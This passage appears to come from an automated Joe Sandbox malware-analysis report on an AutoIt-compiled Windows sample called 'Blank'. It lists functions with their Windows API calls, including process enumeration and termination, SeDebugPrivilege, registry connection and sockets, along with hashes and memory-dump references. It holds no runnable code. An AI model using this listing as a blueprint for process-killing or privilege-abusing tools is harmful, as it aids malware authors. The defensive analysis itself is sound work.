                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window_wcscat
                                                                                                                                    • String ID: SysListView32
                                                                                                                                    • API String ID: 307300125-78025650
                                                                                                                                    • Opcode ID: 7b700f399c75227ca3fddd66d7a0277aaef53467ca6b5b68c346919d0c79c258
                                                                                                                                    • Instruction ID: 0f2b8918464096e549201596043086e900519d827fd9417f2ba7421095f858a5
                                                                                                                                    • Opcode Fuzzy Hash: 7b700f399c75227ca3fddd66d7a0277aaef53467ca6b5b68c346919d0c79c258
                                                                                                                                    • Instruction Fuzzy Hash: 8941CF70A54349AFEB219F65CC85FEE77A8EF08350F50046AF984A71D2D2719D94CB60
                                                                                                                                    Function 002DF01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002C4148: CreateToolhelp32Snapshot.KERNEL32 ref: 002C416D
                                                                                                                                      • Part of subcall function 002C4148: Process32FirstW.KERNEL32(00000000,?), ref: 002C417B
                                                                                                                                      • Part of subcall function 002C4148: CloseHandle.KERNEL32(00000000), ref: 002C4245
                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002DF08D
                                                                                                                                    • GetLastError.KERNEL32 ref: 002DF0A0
                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002DF0CF
                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 002DF14C
                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 002DF157
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 002DF18C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                                                    • Opcode ID: 1e20b858f7de28135104a459d0c536b9d5acaf71eeeb44b2c18b153e738a446a
                                                                                                                                    • Instruction ID: bb31a880ac1528382b0e8fbe1fc22bf223465655ba17b77e63a0ede9d485abd0
                                                                                                                                    • Opcode Fuzzy Hash: 1e20b858f7de28135104a459d0c536b9d5acaf71eeeb44b2c18b153e738a446a
                                                                                                                                    • Instruction Fuzzy Hash: 5541CF712242019FDB11EF24DC95F6DB7A4AF84354F048069F84A4B382CBB0ED64CF99
                                                                                                                                    Function 002756F8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 002B0C5B
                                                                                                                                      • Part of subcall function 00271821: _memmove.LIBCMT ref: 0027185B
                                                                                                                                    • _memset.LIBCMT ref: 00275787
                                                                                                                                    • _wcscpy.LIBCMT ref: 002757DB
                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002757EB
                                                                                                                                    • __swprintf.LIBCMT ref: 002B0CD1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                                                                                                    • String ID: Line %d: $AutoIt -
                                                                                                                                    • API String ID: 230667853-4094128768
                                                                                                                                    • Opcode ID: 0dbfefa1d1e8851720005eb74ec2b09f7564727a0c8480af5812156637a836d5
                                                                                                                                    • Instruction ID: eb268f7ff36141eaf24afeaafb89af39f1322a2bdbb14585013ca94c911c69c3
                                                                                                                                    • Opcode Fuzzy Hash: 0dbfefa1d1e8851720005eb74ec2b09f7564727a0c8480af5812156637a836d5
                                                                                                                                    • Instruction Fuzzy Hash: F141B771028311AAD326EB64DC85FDFB7DCAF44350F104A1EF589920A2DB709669CF97
                                                                                                                                    Function 002C47E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 002C4802
                                                                                                                                    • LoadStringW.USER32(00000000), ref: 002C4809
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 002C481F
                                                                                                                                    • LoadStringW.USER32(00000000), ref: 002C4826
                                                                                                                                    • _wprintf.LIBCMT ref: 002C484C
                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002C486A
                                                                                                                                    Strings
                                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 002C4847
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                    • API String ID: 3648134473-3128320259
                                                                                                                                    • Opcode ID: f7ed742963b0ed13220b321f11c73c9b0e7c2189dbed2e67d80f7e57c02b2aaa
                                                                                                                                    • Instruction ID: 68c3a894994dd64f6f061360ab2a64efdde0080e2cdbfff762ddf6b13d4d5aed
                                                                                                                                    • Opcode Fuzzy Hash: f7ed742963b0ed13220b321f11c73c9b0e7c2189dbed2e67d80f7e57c02b2aaa
                                                                                                                                    • Instruction Fuzzy Hash: 2001A2F28002087FE711ABA4ADCDEF7736CEB08310F4001A5B709E2042EA709E948B74
                                                                                                                                    Function 002EDB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002629E2: GetWindowLongW.USER32(?,000000EB), ref: 002629F3
                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 002EDB42
                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 002EDB62
                                                                                                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 002EDD9D
                                                                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 002EDDBB
                                                                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 002EDDDC
                                                                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 002EDDFB
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 002EDE20
                                                                                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 002EDE43
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1211466189-0
                                                                                                                                    • Opcode ID: 73a71aec2125deb48bf60fb84d9ec27b2cdcdfef21b7302209e8f85b5310e7aa
                                                                                                                                    • Instruction ID: 971ac265e041d0818d6678d28840fb6d4759592e060c0631c7e9ee01e8abee47
                                                                                                                                    • Opcode Fuzzy Hash: 73a71aec2125deb48bf60fb84d9ec27b2cdcdfef21b7302209e8f85b5310e7aa
                                                                                                                                    • Instruction Fuzzy Hash: 9CB17831640256AFDF18CF6AC9C9BBD7BB1FF04711F48806AEC489E295D771A960CB90
                                                                                                                                    Function 002E0371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00271A36: _memmove.LIBCMT ref: 00271A77
                                                                                                                                      • Part of subcall function 002E147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002E040D,?,?), ref: 002E1491
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002E044E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3479070676-0
                                                                                                                                    • Opcode ID: 02bcae1df5b00adac08fde8bd524323ff6162cdefcaecc5bb415ac98b5449406
                                                                                                                                    • Instruction ID: dab2fac494cab9b1df1d919c6414eb237a91ef9287ce1b2c59863492a2b2cad1
                                                                                                                                    • Opcode Fuzzy Hash: 02bcae1df5b00adac08fde8bd524323ff6162cdefcaecc5bb415ac98b5449406
                                                                                                                                    • Instruction Fuzzy Hash: 72A19B702242019FCB10EF65C881F6EB7E4BF84314F54881DF59A8B292DB71E9A2CF42
                                                                                                                                    Function 00262E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ShowWindow.USER32(?,?,00000000,00000000,?,0029C508,00000004,00000000,00000000,00000000), ref: 00262E9F
                                                                                                                                    • ShowWindow.USER32(?,00000000,00000000,00000000,?,0029C508,00000004,00000000,00000000,00000000,000000FF), ref: 00262EE7
                                                                                                                                    • ShowWindow.USER32(?,00000006,00000000,00000000,?,0029C508,00000004,00000000,00000000,00000000), ref: 0029C55B
                                                                                                                                    • ShowWindow.USER32(?,?,00000000,00000000,?,0029C508,00000004,00000000,00000000,00000000), ref: 0029C5C7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ShowWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1268545403-0
                                                                                                                                    • Opcode ID: 09a20d6760441f2416a8d3b91ab32d6a92d7390bae7ed42f6a628f0f95236598
                                                                                                                                    • Instruction ID: 28d8ca70ae2415f07e0e17cdfbe8a847a374d3e40fbae9abc81c5edf4cd58065
                                                                                                                                    • Opcode Fuzzy Hash: 09a20d6760441f2416a8d3b91ab32d6a92d7390bae7ed42f6a628f0f95236598
                                                                                                                                    • Instruction Fuzzy Hash: 0C412930634E81DADB359F2899CC77A7BD2AB81310F74843DE447565A1C7B2B8E8DB10
                                                                                                                                    Function 002C7681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 002C7698
                                                                                                                                      • Part of subcall function 00280FE6: std::exception::exception.LIBCMT ref: 0028101C
                                                                                                                                      • Part of subcall function 00280FE6: __CxxThrowException@8.LIBCMT ref: 00281031
                                                                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 002C76CF
                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 002C76EB
                                                                                                                                    • _memmove.LIBCMT ref: 002C7739
                                                                                                                                    • _memmove.LIBCMT ref: 002C7756
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 002C7765
                                                                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 002C777A
                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 002C7799
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 256516436-0
                                                                                                                                    • Opcode ID: 4901bed77f833751e0fdf6ad6ad7c5be464b0eeed16194fe4faf70524aeaa5a1
                                                                                                                                    • Instruction ID: 7d137a80b1bfdc13bef840e5b33913ff04ccae77536a836129a1485629614936
                                                                                                                                    • Opcode Fuzzy Hash: 4901bed77f833751e0fdf6ad6ad7c5be464b0eeed16194fe4faf70524aeaa5a1
                                                                                                                                    • Instruction Fuzzy Hash: 31318335914109EBCB10EF54DC89EBEB778EF45350B1481A9FD04AB296DB309E64CF60
                                                                                                                                    Function 002E67F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 002E6810
                                                                                                                                    • GetDC.USER32(00000000), ref: 002E6818
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002E6823
                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 002E682F
                                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 002E686B
                                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 002E687C
                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,002E964F,?,?,000000FF,00000000,?,000000FF,?), ref: 002E68B6
                                                                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 002E68D6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3864802216-0
                                                                                                                                    • Opcode ID: d234124eff61ab36fdcc41b0533f4c0e595c38c2b924c5f38f608ee551e13cab
                                                                                                                                    • Instruction ID: b8b948c173daa40b84a9de54346a7d4d6d5dd4044bc2be145f5fa333fb3e209c
                                                                                                                                    • Opcode Fuzzy Hash: d234124eff61ab36fdcc41b0533f4c0e595c38c2b924c5f38f608ee551e13cab
                                                                                                                                    • Instruction Fuzzy Hash: 73317A72141210BFEB118F119C8AFBB3BADEF497A1F044065FE089A292C6759C51CBB4
                                                                                                                                    Function 002BC748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memcmp
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2931989736-0
                                                                                                                                    • Opcode ID: 4d0b18bf83e7efac79f054df5196c1bfae5dbb2ac0426c0bf71643e8b974330e
                                                                                                                                    • Instruction ID: 1b004c432b4835422f0d355e74f7ab114ea968d18114e9af64e4d05e780455ea
                                                                                                                                    • Opcode Fuzzy Hash: 4d0b18bf83e7efac79f054df5196c1bfae5dbb2ac0426c0bf71643e8b974330e
                                                                                                                                    • Instruction Fuzzy Hash: BE210A7663111A76D204B9108D46FFBB76CAE117C4B244031FE02A62C2FB50DE329AA1
                                                                                                                                    Function 002CF166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00264D37: __itow.LIBCMT ref: 00264D62
                                                                                                                                      • Part of subcall function 00264D37: __swprintf.LIBCMT ref: 00264DAC
                                                                                                                                      • Part of subcall function 0027436A: _wcscpy.LIBCMT ref: 0027438D
                                                                                                                                    • _wcstok.LIBCMT ref: 002CF2D7
                                                                                                                                    • _wcscpy.LIBCMT ref: 002CF366
                                                                                                                                    • _memset.LIBCMT ref: 002CF399
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                    • String ID: X
                                                                                                                                    • API String ID: 774024439-3081909835
                                                                                                                                    • Opcode ID: b231913ad72e40386df6bc7b28e08a2156e5e0882429ec6d1a29d2d93cf74d8b
                                                                                                                                    • Instruction ID: ab019eb68b2f68a5bf24b8471334b1399ad9e0eb9da676a2872224bd063165d9
                                                                                                                                    • Opcode Fuzzy Hash: b231913ad72e40386df6bc7b28e08a2156e5e0882429ec6d1a29d2d93cf74d8b
                                                                                                                                    • Instruction Fuzzy Hash: BFC1A0715243419FC764EF24C981E6AB7E5BF85350F008A2DF999972A2DB30EC65CF82
                                                                                                                                    Function 002D71EE Relevance: 10.8, APIs: 7, Instructions: 250COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • #151.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 002D72EB
                                                                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 002D730C
                                                                                                                                    • #111.WSOCK32(00000000), ref: 002D731F
                                                                                                                                    • #15.WSOCK32(?,?,?,00000000,?), ref: 002D73D5
                                                                                                                                    • #11.WSOCK32(?), ref: 002D7392
                                                                                                                                      • Part of subcall function 002BB4EA: _strlen.LIBCMT ref: 002BB4F4
                                                                                                                                      • Part of subcall function 002BB4EA: _memmove.LIBCMT ref: 002BB516
                                                                                                                                    • _strlen.LIBCMT ref: 002D742F
                                                                                                                                    • _memmove.LIBCMT ref: 002D7498
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memmove_strlen$#111#151
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2620998920-0
                                                                                                                                    • Opcode ID: df99463287fdb067489df6129a9795edf757fd95e7693bb09f9be845c80eeb23
                                                                                                                                    • Instruction ID: e765f4ed7c6f918a46f822c53859dbbefd69d8903a93c2c8d2f32671753a06b0
                                                                                                                                    • Opcode Fuzzy Hash: df99463287fdb067489df6129a9795edf757fd95e7693bb09f9be845c80eeb23
                                                                                                                                    • Instruction Fuzzy Hash: A881E171128200ABC311EF24DC86E6BB7B8EF94714F10851EF9569B292EB74DD61CF92
                                                                                                                                    Function 00261800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
